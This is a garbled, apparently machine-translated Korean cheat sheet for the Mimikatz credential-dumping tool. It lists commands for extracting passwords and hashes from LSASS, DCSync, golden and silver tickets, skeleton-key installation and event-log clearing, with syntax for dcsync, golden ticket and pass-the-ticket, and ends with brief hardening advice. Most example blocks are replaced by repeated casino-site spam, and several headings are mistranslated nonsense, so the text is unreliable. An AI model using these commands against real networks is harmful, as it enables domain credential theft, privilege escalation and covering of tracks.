Mimikatz 열 시트

제품정보

Mimikatz는 Benjamin Delpy (@gentilkiwi)가 개발 한 강력한 자격의 덤프 및 조작 도구입니다. 일반 텍스트 암호, 해시, PIN 코드 및 메모리에서 Kerberos 티켓을 추출 할 수 있으며 Pass-the-hash, pass-the-ticket 및 황금 티켓 생성과 같은 다양한 공격을 수행 할 수 있습니다.

· Warning: Mimikatz는 악의적으로 사용할 수있는 보안 테스트 도구입니다. 해당 이용 후기에 달린 코멘트가 없습니다.

Mimikatz 인증 획득

공식 저장소

• GitHub: https://github.com/gentilkiwi/mimikatz
• 최신 릴리스: https://github.com/gentilkiwi/mimikatz/releases

Pre-compiled 의무

• mimikatz.exe - 32비트 실행 가능
• mimikatz_trunk.zip - 32비트와 64비트 실행 가능

편집 부터 Source

카지노사이트

기본 사용

운영 Mimikatz

카지노사이트

관련 기사

카지노사이트

도움 받기

카지노사이트

Mimikatz 출구

카지노사이트

핵심 모듈 및 명령

sekurlsa 모듈 (LSASS 메모리 액세스)

| | Command | Description | | | --- | --- | | | sekurlsa::logonpasswords | Extract all logon passwords | | | | sekurlsa::tickets | Extract Kerberos tickets | | | | sekurlsa::ekeys | Extract Kerberos encryption keys | | | | sekurlsa::dpapi | Extract DPAPI master keys | | | | sekurlsa::credman | Extract credentials from Windows Credential Manager | | | | sekurlsa::msv | Extract MSV authentication information | | | | sekurlsa::tspkg | Extract TSPKG authentication information | | | | sekurlsa::wdigest | Extract WDigest authentication information | | | | sekurlsa::kerberos | Extract Kerberos authentication information | | | | sekurlsa::ssp | Extract SSP authentication information | | | | sekurlsa::livessp | Extract LiveSSP authentication information | | | | sekurlsa::cloudap | Extract CloudAP authentication information | |

lsadump 모듈 (SAM 및 Active Directory)

| | Command | Description | | | --- | --- | | | lsadump::sam | Extract hashes from the SAM database | | | | lsadump::secrets | Extract LSA secrets | | | | lsadump::cache | Extract cached domain credentials | | | | lsadump::dcsync | Perform DCSync attack to retrieve password data | | | | lsadump::lsa | Extract LSA secrets | | | | lsadump::trust | Extract domain trust keys | | | | lsadump::backupkeys | Extract domain backup keys | |

kerberos 단위 (티켓 제조)

| | Command | Description | | | --- | --- | | | kerberos::list | List all Kerberos tickets | | | | kerberos::purge | Purge all Kerberos tickets | | | | kerberos::ptt | Pass-the-ticket (inject a ticket) | | | | kerberos::golden | Create a golden ticket | | | | kerberos::silver | Create a silver ticket | | | | kerberos::tgt | Create a TGT | | | | kerberos::hash | Calculate Kerberos keys from password | |

암호화 모듈 (Cryptographic Operations)

| | Command | Description | | | --- | --- | | | crypto::certificates | List certificates | | | | crypto::keys | List keys | | | | crypto::system | List system certificates | | | | crypto::capi | List CAPI certificates | | | | crypto::cng | List CNG certificates | | | | crypto::stores | List certificate stores | |

vault 모듈 (Windows Vault 액세스)

| | Command | Description | | | --- | --- | | | vault::cred | List credentials in Windows Vault | | | | vault::list | List vault credentials | |

토큰 모듈 (Token Manipulation)

| | Command | Description | | | --- | --- | | | token::whoami | Display current token information | | | | token::list | List all tokens | | | | token::elevate | Elevate token privileges | | | | token::revert | Revert token | | | | token::run | Run a process with a token | |

권한 모듈 (Privilege Management)

| | Command | Description | | | --- | --- | | | privilege::debug | Enable debug privilege | | | | privilege::driver | Load a driver | |

이벤트 모듈 (Event Log Management)

| | Command | Description | | | --- | --- | | | event::clear | Clear event logs | | | | event::drop | Drop event logs | |

ts 모듈(Terminal Services)

| | Command | Description | | | --- | --- | | | ts::sessions | List terminal services sessions | | | | ts::multirdp | Enable multiple RDP sessions | |

misc 모듈 (중등)

| | Command | Description | | | --- | --- | | | misc::cmd | Command prompt | | | | misc::regedit | Registry editor | | | | misc::taskmgr | Task manager | | | | misc::ncroutemon | Network connection route monitor | | | | misc::detours | Detours detection | | | | misc::skeleton | Install skeleton key | |

일반 공격 기술

공급 업체

추출물 Logon 암호

카지노사이트

SAM에서 Credentials 추출

카지노사이트

법적 고지

카지노사이트

LSASS 덤프에서 추출

카지노사이트

Pass-the-Hash 공격

NTLM을 사용한 패스-하쉬

카지노사이트

AES Keys를 사용한 Pass-the-Hash

ο 회원 관리

오버 패스 - 해시 (Kerberos에 NTLM을 변환)

카지노사이트

DCSync 공격

모든 사용자를 위한 NTLM 해시 추출

카지노사이트

특정 사용자를 위한 NTLM 해시 추출

카지노사이트

KRBTGT 용 NTLM 해시 추출 (황금 티켓 용)

카지노사이트

Kerberos 티켓 공격

Kerberos 티켓

카지노사이트

골든 티켓 만들기

카지노사이트

실버 티켓 만들기

카지노사이트

패스-티켓

카지노사이트

티켓 구매

오프화이트

Skeleton 키 공격

카지노사이트

고급 기술

DPAPI 마스터 키 추출

오프화이트

LSA 보호 우회

카지노사이트

원격 작업

카지노사이트

Windows Credential Manager에서 Credentials 추출

카지노사이트

도메인 백업 키 추출

카지노사이트

매개 변수와 명령 예제

sekurlsa::로그온 패스워드

카지노사이트

정액::pth

카지노사이트

lsadump::DCsync의

lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:\\\\{object-guid\\\\}]
lsadump::dcsync /domain:DOMAIN /all [/csv]
```의 경우

### kerberos::금

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE] ```에 대하여

kerberos::ptt의

kerberos::ptt TICKET_FILE
```의 경우

## 방어 측정

### 검출 방법
- mimikatz.exe 또는 lsass에 접근하는 suspicious 과정의 과정을 위한 감시자. 다운로드
- 의심스러운 LSASS 메모리 액세스를 위한 모니터
- DCSync 가동을 위한 감시자 (non-DC 기계에서 신청 요구)
- 티켓 작성 및 조작을위한 모니터
- escalation을 위한 모니터

### 예방 방법
- Enable LSA 보호 (RunAsPPL)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f

에 대하여 - 잠재적 인 가드 (Windows 10/Server 2016+) - 보호된 구현 사용자 그룹 - WDigest 인증 reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f

```의 경우 - JEA(JEA) - 비밀번호 - 제한 관리 권한 - 강력한 비밀번호 사용

지원하다

• Official GitHub 저장소
• Mimikatz 위키
• ADSecurity 미미카츠 가이드
• MITRE ATT&CK; - Credential Dumping
• MITRE ATT&CK; - 해시 통과
• MITRE ATT&CK; - 티켓 통과